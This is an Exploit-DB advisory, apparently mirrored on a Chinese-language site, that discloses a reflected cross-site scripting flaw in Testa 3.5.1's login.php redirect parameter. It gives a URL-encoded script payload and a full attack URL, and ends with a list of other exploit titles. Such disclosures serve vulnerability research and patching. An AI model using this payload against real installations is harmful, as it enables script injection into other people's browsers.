Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)

Exploit Database
15 阅读

作者： Ashkan Moghaddas

日期： 2022-09-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51023/

# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link:
https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload:
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.

# Go to this url "
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
"
XSS will trigger.

last Exploits
Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)的更多信息

SEO Control Panel 3.6.0 – (Authenticated) SQL Injection：
Flash Operator Panel 2.31.03 – Command Execution：
Perch v3.2 – Persistent Cross Site Scripting (XSS)：
pdirl PHP Directory Listing 1.0.4 – Cross-Site Scripting：
Joomla! Component Room Management 1.0 – SQL Injection：
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) – Credentials Disclosure：
WordPress Plugin Media Library Assistant 2.81 – Local File Inclusion：
Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection：